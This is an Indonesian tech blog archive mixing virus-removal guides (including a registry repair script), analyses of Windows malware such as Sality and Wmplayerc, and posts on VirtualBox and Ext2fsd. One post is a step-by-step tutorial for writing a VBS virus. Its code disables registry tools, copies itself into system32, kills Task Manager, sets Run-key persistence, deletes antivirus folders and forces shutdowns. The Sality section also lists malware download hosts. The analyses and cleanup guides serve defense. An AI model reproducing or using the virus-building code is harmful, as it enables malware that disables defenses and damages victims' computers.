
%xx% menunjukan karakter acak, key ini dibuat untuk menjalankan file .SYS yang mempunyai ukuran sebesar 40 KB yang berada di direktori [C:\Windows\system32\drivers\]

5. Restart komputer, pulihkan sisa registry yang diubah oleh virus dengan copy script berikut pada program notepad kemudian simpan dengan nama repair.inf. Jalankan file tersebut dengan cara: klik kanan repair.inf | klik install

[Version]

Signature="$Chicago$"

Provider=Vaksincom Oyee

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKLM, software\microsoft\ole, EnableDCOM,0, "Y"

HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusDisableNotify,0x00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,FirewallDisableNotify,0x00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,AntiVirusOverride,0x00010001,0

HKLM, SOFTWARE\Microsoft\Security Center,FirewallOverride,0x00010001,0

HKLM, SYSTEM\ControlSet001\Control\Lsa, restrictanonymous, 0x00010001,0

HKLM, SYSTEM\ControlSet002\Control\Lsa, restrictanonymous, 0x00010001,0

HKLM, SYSTEM\CurrentControlSet\Control\Lsa, restrictanonymous, 0x00010001,0

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, CheckedValue,0x00010001,0

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, DefaultValue,0x00010001,0

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, UncheckedValue,0x00010001,1

[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,ctfmon.exe

HKLM, SYSTEM\ControlSet001\Services\kernelx86

HKLM, SYSTEM\ControlSet002\Services\kernelx86

HKLM, SYSTEM\CurrentControlSet\Services\kernelx86

HKLM, SYSTEM\CurrentControlSet\Services\mojbtjlt

HKLM, SYSTEM\ControlSet001\Services\mojbtjlt

HKLM, SYSTEM\ControlSet002\Services\mojbtjlt

HKLM, SYSTEM\ControlSet001\Services\Passthru

HKLM, SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore

HKLM, SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, DoNotAllowXPSP2

HKLM, SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe

6. Fix registry Windows untuk mengembalikan agar komputer dapat booting “safe mode with command prompt” dengan download file FixSafeBoot.reg (Windows XP) di alamat berikut kemudian jalankan file tersebut dengan cara :

o Klik menu [Start]

o Klik [Run]

o Ketik REGEDIT.EXE kemudian klik tombol [OK]

o Pada layar “Registry Editor”, klik menu [File | Import]

o Tentukan file .REG yang baru anda buat

o Klik tombol [Open]

7. Hapus file temporary dan temporary internet file. Silahkan gunakan tools ATF-Cleaner. Download tools tersebut di alamat http://www.atribune.org/public-beta/ATF-Cleaner.exe

8. Restore kembali host file Windows yang telah di ubah oleh virus. Anda dapat menggunakan tools Hoster, silahkan download di alamat berikut http://www.softpedia.com/progDownload/Hoster-Download-27041.html

9. Untuk pembersihan optimal dan mencegah infeksi ulang, scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini. Anda juga dapat menggunakan Norman Malware Cleaner, silahkan download di alamat berikut http://www.norman.com/support/support_tools/58732/en.

Virus WMPLAYERC

2010-01-25T17:30:00.000-08:00

Ya....sebelumnya natal dan tahun baru 2009 ya.....sori kelamaan....
Wmplayerc merupakan worm lokal yang sudah dikenal sejak PCMAV 2.2a Update Build3 dan dilaporkan menyebar luas di Indonesia. Kali ini akan ditampilkan analisa lebih lengkapnya. Efek merugikan dari virus ini adalah menghapus file-file multimedia yang dikenali dari daftar ekstensi file yang disimpan pada tubuh virus. File-file multimedia yang ditemukan akan digantikan dengan file virus yang siap dijalankan dan menyebar.

Daftar Ekstensi File
Berikut adalah daftar ekstensi file multimedia yang dapat menjadi korban virus ini adalah:
.AVI
.3GP
.MP4
.FLV
.ASF
.M4V
.MPE
.VMV
.M1V
.M2V
.VOB
.MOV
.WVX
.MKV
.MPA
.MPV
.DIV
.M2P
.3G2
.DAT
.MPEG
.DIVX
.REAL

Manipulasi Folder
Dalam upayanya menyembunyikan diri dan kembali aktif (seandainya Anda berhasil mematikan prosesnya di memory), virus ini membuat duplikat folder-folder yang ada pada root drive dalam bentuk shortcut/link, dan menyembunyikan folder asli dengan atribut sistem/superhidden.

Alhasil, sekilas komputer Anda tampak baik-baik saja, hanya saja kalau diperhatikan melalui Windows Explorer, Anda akan melihat folder yang ada pada root drive (misalnya Windows, Program Files) memiliki size 2 KB. Sementara, folder yang sesungguhnya tidak
mencantumkan ukuran pada Windows Explorer. Untuk melihat kondisi sebenarnya, atur konfigurasi Windows Explorer dengan memilih menu Tools – Folder Options, pililh “Show hidden files and folders”, dan hapus tanda centang pada pilihan “Hide extensions for known file types” dan “Hide protected operating system files (Recommended)”.

Apa yang terjadi saat Anda meng-klik folder bohongan tersebut? Yang dijalankan adalah perintah berikut:

%WINDIR%\system32\rundll32.exe Shell32.dll,ShellExec_RunDLL “RÊCYCLÊR\ .com” “NamaFolder”

“NamaFolder” adalah folder sebenarnya. Folder tersebut tetap terbuka, tetapi sebelumnya virus telah dieksekusi, terlihat bahwa induk virus disimpan dengan nama “ .com” (tanpa tanda kutip) pada folder RÊCYCLÊR.

Pembedahan Virus
Virus ini memiliki beberapa “daftar cekal” berupa URL website-website porno lokal, jadi saat komputer yang terinfeksi melakukan browsing ke beberapa website porno tersebut, komputer akan shutdown dengan sendirinya.

Virus juga melakukan pengecekan terhadap program yang berjalan, dengan mendeteksi caption yang terdapat pada program tersebut. Kembali beberapa kata berkonotasi porno dicekal oleh virus. Selain itu, string Norman Malware Cleaner, PROCEXPL, PeiD v0.95, PeiD v0.94, dan OLLYDBG juga termasuk daftar string yang akan membuat sang virus melakukan shutdown pada komputer.

Komputer dapat terinfeksi virus ini melalui flash disk yang telah terinfeksi, yaitu saat pengguna meng-klik folder bohongan pada flash disk atau media storage yang sebenarnya berupa link pemanggil virus. Selain itu, ketidakwaspadaan juga dapat membuat Anda mengklik file virus yang menyamar sebagai file multimedia, lengkap dengan icon media player untuk menjebak pengguna.

Selain menciptakan file induk yang berukuran sekitar 66 KB pada folder RÊCYCLÊR, file induk juga diciptakan pada folder Program Files\Windows Media Player dengan nama Wmplayerc.exe atau Xvidshow.exe (jika komputer Anda terinstal codec XviD). Pengambilan string dengan membedah dan memetakan kembali tubuh virus divisualisasikan pada gambar berikut.

Pada tubuh virus juga terdapat perintah shutdown.exe -r -f -t 00, yang besar kemungkinannya merupakan perintah yang akan dieksekusi saat virus mendeteksi pengaksesan website porno atau caption tertentu. Parameter -r memberikan instruksi shutdown dan restart, parameter -f memaksa aplikasi lain tertutup, dan parameter -t 00 merupakan timeout untuk melakukan proses shutdown, dalam hal ini diset 0 detik.

Saat aktif, virus ini memuat file dropper ke memory dengan nama svchost.exe, yang berfungsi untuk memonitor traffic TCP/IP sehingga dapat mendeteksi saat Anda menjalankan URL yang termasuk dalam daftar web porno yang disimpan oleh dropper. File dropper ini dibuat dengan VisualBasic dan berukuran sekitar 9 KB. Selain itu, string bertuliskan “Tak gendong kemana-mana.. Enak Tau !!! Ha Ha Ha Ha” juga tampak pada tubuh file ini.

Gunakan PCMAV terbaru untuk pembersihan secara tuntas virus Wmplayerc. Perhatikan jika terdapat file yang Anda yakini adalah nama file multimedia milik Anda - tetapi terdeteksi sebagai virus Wmplayerc - maka file tersebut sudah bukan file video yang asli lagi, tetapi file virus yang menyamar (silakan cek ukuran dan ekstensi file tersebut jika Anda masih ragu-ragu), sedangkan file video yang asli telah raib dihapus oleh virus tersebut. Lakukan recovery sebisanya jika Anda terlanjur mengalami hal ini, tapi tetap jangan buka bokep!

Mengakses partisi Linux dari Windows

2009-12-20T02:39:00.000-08:00

Jika komputer kita menggunakan sistem operasi Windows dan Linux (dual OS), kemungkinan besar, menggunakan Ext2fsd akan sangat berguna. Ext2fsd (ext2fsd.sourceforge.net) adalah driver sistem file untuk Windows (2000, XP dan 2003) open source yang dapat digunakan untuk mounting partisi linux (ext2 dan ext3), sehingga memungkinkan kita mengakses (read dan write) partisi linux saat kita menggunakan Windows. Hasil mounting akan menjadi drive baru dalam Windows.

Saya sudah mencoba dengan menginstall dari installer file exe-nya. Pada jendela manager, saya jalankan service, mengeset partisi ext3 sebagai drive L. Hanya saja ketika Windows saya restart, meskipun service tetap berjalan –begitu juga dengan Ext2fsd manager-nya yang muncul pada system tray, tetapi partisi ext3 Ubuntu di PC saya tidak otomatis dimounting pada drive L yang saya set sebelumnya. Jadi, saya harus me-mounting ulang partisi ketika akan menggunakan (yang ini agak menyebalkaaan)

Mencoba VirtualBox

2009-12-20T02:28:00.000-08:00

VirtualBox merupakan software untuk melakukan virtualisasi hardware, sehingga memungkinkan pada komputer yang terinstall Windows XP misalnya (host), dengan VirtualBox kita dapat menginstall linux atau sistem operasi lainnya (guest), dan antara host dan guess dapat berjalan bersamaan. Cara ini mungkin cocok bagi yang berniat mencoba linux tanpa harus menginstall secara sendiri atau dual boot, tentu dengan berbagai keterbatasannya. Ketersediaan memory untuk menjalankan dua sistem operasi secara bersamaan merupakan faktor yang menurut saya perlu diperhatikan agar keduanya dapat berjalan dengan baik.

VirtualBox yang dapat digunakan secara gratis dan berlisensi GNU/GPL ini dapat berjalan pada Windows, Linux atau Macintosh sebagai host dan mendukung sejumlah sistem operasi yang dapat dijadikan guess-nya termasuk Windows (NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x, Linux (2.4 dan 2.6), dan OpenBSD. VirtualBox saat ini hanya dapat mengemulasi mesin Intel x86.

Ketika berjalan, untuk masuk ke sistem operasi guess dilakukan dengan mengklik mouse pada layar guess, dan untuk kembali ke host, defaultnya dilakukan dengan menekan tombol Ctrl sebelah kanan. Untuk berbagi folder host untuk guess, dengan mudah dapat difasilitasi dengan fasilitas share folder. Jika ingin mencoba mouse tembus :-)(kagak make ctrl kanan)install aja VirtualBox Guest Additions.

Download VirtualBox
www.virtualbox.org

Download Linux Mint 8 utk OS guest cobaan
www.linuxmint.com

Anti Virus

2009-11-05T23:30:00.001-08:00

Untuk virus-virus dibawah, pilih antinya antara SmadAV, PCMAV atau Ansav.

Cara Mudah Membuat Virus Format *.VBS

2009-10-30T16:33:00.000-07:00

Pertama2, berikut ini hal-hal
yang wajib kita siapin sebelum
membuat virus.

# seperangkat komputer
berikut
monitor,cpu,mouse,kibor, dll
(wajib)

# kita harus menyiapkan
sebuah file yang ber-ekstensi
vbs (*.vbs)

# secangkir teh anget.

Untuk eksekusi pertama, yang
dilakukan virus biasanya
mengubah registry.

misalnya:

1. mendisable regedit. Yang
kita tulis:

On Error Resume
Next(perintah ini digunakan
pada file vb

supaya kalo ada yang salah
bisa dilanjutin kode
selanjutnya)

CreateObject("WScript.Shell
").run "cmd.exe /c reg add
hkcusoftware\microsoft\wi
ndows\currentversion\polici
es\system /v

disableregistrytools /t
reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk
mendisable regedit. misalnya
kek gini:

CreateObject("WScript.Shel
l").regwriteHKEY_CURRENT
_USERsoftware\microsoft\wi
ndows\currentversion\policie
s\systemdisableregistrytools",
1, "REG_DWORD"

2. mengopikan diri ke
direktory lain

CreateObject("Scripting.File
SystemObject").

GetFile(WScript.ScriptFullName).Copy
"c:\windows\system32\virus.
vbs"

Ada juga cara lain dengan seperti ini:

On Error Resume Next

createobject("scripting.files
ystemobject").copyfile
wscript.scriptfullname,

createobject("scripting.files
ystemobject")

.getspecialfolder(1) &
"\virus.vbs"

misalnya untuk mengkopikan
diri ke direktory
C:\WINDOWS\System32

dengan nama virus.vbs

.getspecialfolder(0) digunakan
untuk direktory WINDOWS

.getspecialfolder(1 ) digunakan
untuk direktory SYSTEM32
pada windowsXP

.getspecialfolder(2) digunakan
untuk direktory Temporary

3.Membunuh proses .

digunakan untuk membunuh
proses

(proses adalah program yang
sedang berjalan)

misalnya kita akan membunuh
proses taskmanager

On Error Resume Next

CreateObject("WScript.Shell")

.run "taskkill /f /im
taskmgr.exe", vbhide

4.Menjalankan virus pada saat
startup atau saat windows
dihidupkan.

menggunakan regedit

On Error Resume Next

CreateObject("WScript.Shell
").RegWrite
"HKEY_LOCAL_MACHINESof
tware\Microsoft\Windows\Cu
rrentVersion\Run\virus"

,
"c:\windows\system32\virus.
vbs"

(menjalankan virus yang
berada di direktory
c:\windows\system32

dengan nama virus.vbs)

5.Menghapus File / Folder

agar virus yang kita buat tidak
banyak menggunakan script
bisa di singkat seperti ini:

On Error Resume Next

set hapus =
CreateObject("Scripting.Fil
eSystemObject")

hapus.DeleteFile
"C:\xxx.exe"'(menghapus file
xxx.exe di direktory C:\)

hapus.DeleteFolder
"C:\antivirus"'(menghapus
folder antivirus di direktory
C:\)

6.Merestart Windows

CreateObject("WScript.Shell
").run "shutdown -r -f -t 60",
vbhide

merestart windows dalam
waktu 60 sekon

7.Meng-ShutDown Windows

CreateObject("WScript.Shell
").run "shutdown -s-f -t 60",
vbhide

mematikan windows dalam
waktu 60 sekon yang beda
cuman

"shutdown -s-f -t 60"

S = untuk shutdown dan

R = untuk reboot\restart

8. Mengaktifkan Virus Pada
Waktu tertentu

If day(now) = 1 and
month(now) = 1 and year(now)
= 2007 then

'(masukkan kode virus disini)

End if

'misalnya kalo mau
mengaktifkan pada tanggal 1 ,
bulan 1

'dan tahun 2007

W32/Sality.AE

2009-10-29T07:13:00.000-07:00

Kalau Conficker dapat dikatakan sebagai worm nomor satu di Indonesia, maka predikat virus yang paling merepotkan dan paling banyak ditemui Vaksincom di Indonesia pantas di sandang oleh Sality. Virus yang disinyalir berasal dari Taiwan / Cina ini secara meyakinkan menempati ranking pertama dalam infeksi virus yang diterima oleh Vaksincom bersama-sama dengan Conficker.

Memang menyebalkan jika semua program kita ikut dimakan oleh virus [di infeksi], disamping sulit dalam memberantas virusnya terkadang juga file yang sudah di injeksi tersebut tidak dapat digunakan alias rusak setelah di scan dan dibersihkan oleh antivirus, alhasil harus reinstall semua program yang error atau download ulang file yang sudah di injenksi tersebut.

Salah satu virus yang akan menginjeksi file exe/com/scr ini adalah W32/Sality.AE.

Ukuran file yang sudah terinfeksi W32/Sality.AE akan bertambah besar beberapa KB dan file yang sudah terinfeksi W32/Sality.AE ini masih dapat di jalankan seperti biasa. Biasanya virus ini akan mencoba untuk blok program antivirus atau removal tools saat dijalankan serta mencoba untuk blok task manager atau “registry editor” Windows. Untuk mempermudah dalam proses penyebarannya selain memanfaatkan “File Sharing” dan “Default Share” virus ini juga akan memanfaatkan media Flash Disk dengan cara membuat file acak yang mempunyai ekstensi exe/com/scr/pif serta menambahkan file autorun.inf yang memungkinkan virus dapat aktif secara otomatis setiap kali user mengakses Flash Disk.

Untuk blok task manager atau Registry tools, W32/Sality.AE ini akan membuat string pada registry berikut:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system

DisableRegistryTools
DisableTaskMgr

Pada saat file yang terinfeksi W32/Sality.AE, ia akan mendekrip dirinya dan mencoba untuk kopi beberapa file *.dll (acak) file DLL kemudian akan menginjeksi file lain yang aktif di memori serta file lain yang terdapat di komputer dan jaringan (file sharing) serta menginfeksi file *.exe yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

Berikut beberapa contoh file *.dll yang akan di drop oleh W32/Sality.AE.

C:\Windows\system32\syslib32.dll
C:\Windows\system32\oledsp32.dll
C:\Windows\system32\olemdb32.dll
C:\Windows\system32\wcimgr32.dll
C:\Windows\system32\wmimgr32.dll

Selain membuat file DLL, sality juga akan membuat file *.sys [acak] di direktori “C:\Windows\system32\drivers” [contoh: kmionn.sys]

Blok Antivirus dan software security

Seperti yang sudah dijelaskan di atas bahwa untuk mempermudah proses penyebaran ia juga akan mencoba untuk mematikan proses yang berhubungan dengan program security khususnya antivirus dengan cara mematikan proses yang mempunyai nama dibawah ini:

ALG	InoRPC
aswUpdSv	InoRT
avast! Antivirus	InoTask
avast! Mail Scanner	ISSVC
avast! Web Scanner	KPF4
AVP	LavasoftFirewall
BackWeb Plug-in - 4476822	LIVESRV
bdss	McAfeeFramework
BGLiveSvc	McShield
BlackICE	McTaskManager
CAISafe	navapsvc
ccEvtMgr	NOD32krn
ccProxy	NPFMntor
ccSetMgr	NSCService
F-Prot Antivirus Update Monitor	Outpost Firewall main module
fsbwsys	OutpostFirewall
FSDFWD	PAVFIRES
F-Secure Gatekeeper Handler Starter	PAVFNSVR
fshttps	PavProt
FSMA	PavPrSrv
PAVSRV	Symantec Core LC
PcCtlCom	Tmntsrv
PersonalFirewal	TmPfw
PREVSRV	tmproxy
ProtoPort Firewall service	UmxAgent
PSIMSVC	UmxCfg
RapApp	UmxLU
SmcService	UmxPol
SNDSrvc	vsmon
SPBBCSvc	VSSERV
WebrootDesktopFirewallDataService	WebrootFirewall
	XCOMM

Selain mematikan proses antivirus di atas, ia juga akan berupaya untuk blok agar user tidak dapat mengakses web dari beberapa antivirus berikut:

Cureit
Drweb
Onlinescan
Spywareinfo
Ewido
Virusscan
Windowsecurity
Spywareguide
Bitdefender
Panda software
Agnmitum
Virustotal
Sophos
Trend Micro
Etrust.com
Symantec
McAfee
F-Secure
Eset.com
Kaspersky

W32/Sality.AE juga akan mencoba untuk merubah regisrty berikut:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\"GlobalUserOffline" = "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxx [xxx adalah acak, contoh : abp470n5]
HKEY_CURRENT_USER\Software\[USER NAME]914
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER

Selain itu ia juga akan mencoba untuk merubah beberapa string registry Windows Firewall berikut dengan menambahkan value dari 0 menjadi 1:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

AntiVirusDisableNotify
AntiVirusOverride
FirewallDisableNotify
FirewallOverride
UacDisableNotify
UpdatesDisableNotify

dan membuat key “SVC” serta string berikut dengan value 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc

AntiVirusDisableNotify
AntiVirusOverride
FirewallDisableNotify
FirewallOverride
UacDisableNotify
UpdatesDisableNotify

Tak cuma itu W32/s\Sality.AE juga akan menghapus key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG”.

ALG atau Application Layer Gateway Service adalah services yang memberikan support untuk plug-in protokol aplikasi dan meng-enable konektivitas jaringan / protokol. Service ini boleh saja dimatikan. Dampaknya adalah program seperti MSN Messenger dan Windows Messenger tidak akan berfungsi. Service ini bisa dijalankan, tetapi hanya jika menggunakan firewall, baik firewall bawaan Windows atau firewall lain. Jika tidak komputer yang terinfeksi virus ini akan mengalami celah keamanan yang serius.

Blok akses “safe mode”

Dalam rangka “mempertahankan” dirinya, W32/Sality.AE juga akan mencoba untuk blok akses ke mode “safe mode” sehingga user tidak dapat booting pada mode “safe mode” dengan menghapus key yang berada di lokasi di bawah ini :

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

Injeksi file exe/com/scr

Tujuan utama dari virus ini adalah mencoba untuk menginjeksi program instalasi dan file yang mempunyai ekstensi exe/com/scr yang ada di drive C - Y terutama file hasil instalasi (file yang berada di direktori C:\Program Files) dan file-file portable (file yang langsung dapat dijalankan tanpa perlu instal), ia juga akan menginfeksi file yang mempunyai ekstensi “.exe” yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

File yang berhasil di injeksi biasanya ukurannya akan bertambah sekitar 68 - 80 KB dari ukuran semula. Program yang telah terinfeksi ini akan tetap dapat di jalankan seperti biasa sehingga user tidak curiga bahwa file tersebut sebenarnya telah di infeksi oleh W32/Sality.AE. Salah satu kecanggihan Sality adalah kemampuannya menginjeksi file tumpangannya sehingga ukuran file bervirus tidak seragam, jelas lebih sulit diidentifikasi dibandingkan virus lain yang menggantikan file yang ada sehingga ukuran filenya akan sama besar.

Harap berhati-hati, tidak semua program antivirus dapat membersihkan file yang sudah terinfeksi W32/Sality.AE, bisa-bisa file tersebut akan rusak setelah di scan dan di bersihkan oleh antivirus tersebut.

Tidak mau kalah dengan virus mancanegara lain, untuk memperlancar aksinya ia akan mencoba untuk melakukan koneksi ke sejumlah alamat web yang sudah ditentukan dengan tujuan untuk memanggil/mendownload trojan/virus lainnya yang di sinyalir merupakan varian dari versi sebelumnya yang memungkinkan virus ini dapat mengupdate dirinya.

[http://]pedmeo222nb.info

[http://]pzrk.ru

[http://]technican.w.interia.pl

[http://]www.kjwre9fqwieluoi.info

[http://]bpowqbvcfds677.info

[http://]bmakemegood24.com

[http://]bperfectchoice1.com

[http://]bcash-ddt.net

[http://]bddr-cash.net

[http://]btrn-cash.net

[http://]bmoney-frn.net

[http://]bclr-cash.net

[http://]bxxxl-cash.net

[http://]balsfhkewo7i487fksd.info

[http://]buynvf96.info

[http://]89.119.67.154/tes[xxx]

[http://]oceaninfo.co.kr/picas[xxx]

[http://]kukutrustnet777.info/home[xxx]

[http://]kukutrustnet888.info/home[xxx]

[http://]kukutrustnet987.info/home[xxx]

[http://]kukutrustnet777.info

[http://]www.kjwre9fqwieluoi.info

[http://]kjwre77638dfqwieuoi.info

http://mattfoll.eu.interia.pl/[sensor]

http://st1.dist.su.lt/l[sensor]

http://lpbmx.ru/[sensor]

http://bjerm.mass.hc.ru/[sensor]

http://SOSiTE_AVERI_SOSiTEEE.[sensor]

Mengeksploitasi Default Share dan Full Sharing

W32/Sality.AE akan menyebar dengan cepat melalui jaringan dengan memanfaatkkan default share windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr. Karena itu, Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari Full Sharing folder anda di jaringan.

Selain menyebar dengan menggunakan jaringan, ia juga akan memanfaatkan flash disk yakni dengan cara kopi dirinya dengan nama file acak dengan ekstensi exe/cmd/pif serta membuat file autorun.inf agar dirinya dapat aktif secara otomatis tanpa harus menjalankan file yang sudah terinfeksi virus, selain itu ia juga akan menginfeksi file yang mempunyai ekstensi exe/com/scr yang terdapat dalam flash disk tersebut.

W32/VBTroj.VNE Rieysha

2009-10-28T23:09:00.000-07:00

Jika komputer anda menampilkan pesan notepad dengan nama file "system32pesan_dari_rieysha.txt" sebagai berikut :

sayang kapan kamu kembali ke indonesia?
apa kamu kembali dengan hatimu yang dulu?

by:rieysha

Anda jangan buru-buru senang atau GR, apalagi anda buru-buru kembali ke Indonesia. Karena anda bukan mendapatkan pesan dari Rieysha, melainkan komputer anda terinfeksi virus W32/VBTroj.VNE.

Begitu pula jika pesan tersebut muncul di file MS Word anda dengan nama "system32pesan.doc" dengan pesan :
yanx kapan kamu balik?
aku sudah kangen berat nih
kenapa sih mesti pergi jauh dariku
apa kamu kembali dengan hatimu yang dulu
apa aku akan merasakan kehangatan cinta yang dulu

Setelah sebelumnya muncul virus dengan nama W32/VBTroj.AOQB atau lebih dikenal dengan nama virus Nadia Saphira yang merupakan reinkarnasi dari virus Donal Bebek, kini telah muncul virus baru dengan nama W32/VBTroj.VNE atau lebih dikenal dengan nama virus [Rieysha]. Virus ini juga menggunakan nama acak untuk menamai filenya, salah satunya adalah ikut2an mencatut nama NadiaSafira.exe sebagai nama filenya. Namun jika dilihat dari aksinya virus reinkarnasi Rieysha yang satu ini lebih ganas dibandingkan virus Nadia Saphira W32/VBTroj.AOQB.

Untuk informasi lebih jauh mengenai virus Nadia Saphira, klik url berikut:
http://www.vaksin.com/2009/0509/nadia%20saphira/nadia%20saphira.html

Virus ini dibuat dengan menggunakan bahasa Borland Delphi dengan ukuran sekitar 228 KB dan jika dilihat dari pesan yang akan ditampilkan oleh pembuat virus, kemungkinan virus ini berasal dari kota Gudeg tempat asal Mang Engking. Kalau Mang Engking sukses buka restoran dengan menu Udang Galah, maka virus jebolan [Rieysha] ini juga sukses merepotkan korbannya seperti pada virus W32/Delf.DCDW yang pernah dibuat sebelumnya.

Virus ini lebih mudah di ketahui hanya dengan melihat icon dari file yang menyertainya, yakni menggunakan icon gambar dengan rupa seorang gadis bersanggul seperti terlihat pada gambar dibawah ini : (lihat gambar 3)

Ciri-Ciri komputer yang terinfeksi
Mengganti tampilan walpaper/desktop
Ciri-ciri yang dapat dikenali dari virus ini adalah dimana virus ini akan menutup desktop/wallpaper dengan wallpaper dirinya yang berisi pesan error, dengan digantinya walpaper ini maka user sudah tidak bisa mengakses komputer tersebut, jadi pembersihan hanya dapat dilakukan pada mode “DOS” atau dengan menggunakan software lain seperti “Mini PE”
Merubah format penanggalan dari PM/AM menjadi [Rieysha]
Merubah nama Organisasi dan pemilik OS menjadi
- RegisteredOrganization = kamu kembali
- RegisteredOwner = sayang kapan
Disable beberapa fungsi Windows seperti
o Disable Task Manager
o Menyembunyikan menu ShutDown komputer
o Menyembunyikan Drive
o Mengaktifkan fungsi Autorun, agar virus dapat aktif secara otomatis pada saat user mengakses Drive/Flash Disk
o Menyembunyikan fungsi pencarian file/folder [Search]
o Menyembunyikan [Folder Options]
o Menyembunyikan [Run]
o Menyembunyikan [Start Menu Programs]

Dengan update terbaru Norman Security Suite mendeteksi virus ini sebagai W32/VBTroj.VNE.

Autoit-Hubbun

2009-10-27T23:55:00.001-07:00

Virus lokal yang ingin mengikuti jejak Autoit, karena menggunakan aplikasi scripting Autoit dalam pembuatannya. Ia menggunakan icon folder dalam penyebarannya. File induknya berada pada direktori \Windows\System32\wbem\services.exe. Virus ini juga menciptakan file hubbun.txt yang berisi pesan dari si pembuat. Ia masih banyak memiliki bug, terlihat dalam aksinya beberapa kali menampilkan kesalahan pada script.

Autoit virus

2009-10-27T23:54:00.000-07:00

Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.

Recycler

2009-10-27T23:53:00.000-07:00

Seperti pendahulunya, yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya. Pada Build3 kali ini, telah disertakan engine cleaner khusus yang dapat membasmi varian Recycler tersebut dengan tuntas. Silakan scan komputer secara menyeluruh, basmi setiap virus yang ditemukan, dan jangan lupa untuk me-restart komputer Anda.

Conflicker

2009-10-27T23:52:00.000-07:00

Virus luar berteknologi canggih ini memang menyebar luar biasa. Bentuknya yang merupakan file DLL (Dynamic Link Library) membedakannya dengan kebanyakan virus lain yang berupa EXE. Kemampuan yang dimilikinya juga bisa disetarakan dengan rootkit. Serta, sifatnya ber-polymorphic membuatnya memiliki tubuh yang berubah-ubah. Pada komputer terinfeksi, user tidak akan dapat membuka situs yang “berbau” antivirius atau Microsoft update. Virus ini juga aktif menyebar di Indonesia dengan menggunakan media removable disk misalkan flash disk. Pada flash disk terinfeksi, Anda akan menemukan file autorun.inf dan direktori RECYCLER yang di dalamnya terdapat sub-direktori dengan nama misalkan S-5-3-42-2819952290-8240758988-879315005-3665, dan pada direktori inilah terdapat file virus Conficker dengan nama biasanya jwgkvsq.vmx yang sebenarnya adalah file DLL.

Virus Induc

2009-10-27T23:47:00.001-07:00

Apabila ada di antara Anda sekalian yang menggunakan PCMAV seri 2.1x bersamaan dengan antivirus lain dalam satu PC, dan mendapatkan warning bahwa file PCMAV mengandung kode virus Induc, tidak perlu khawatir.
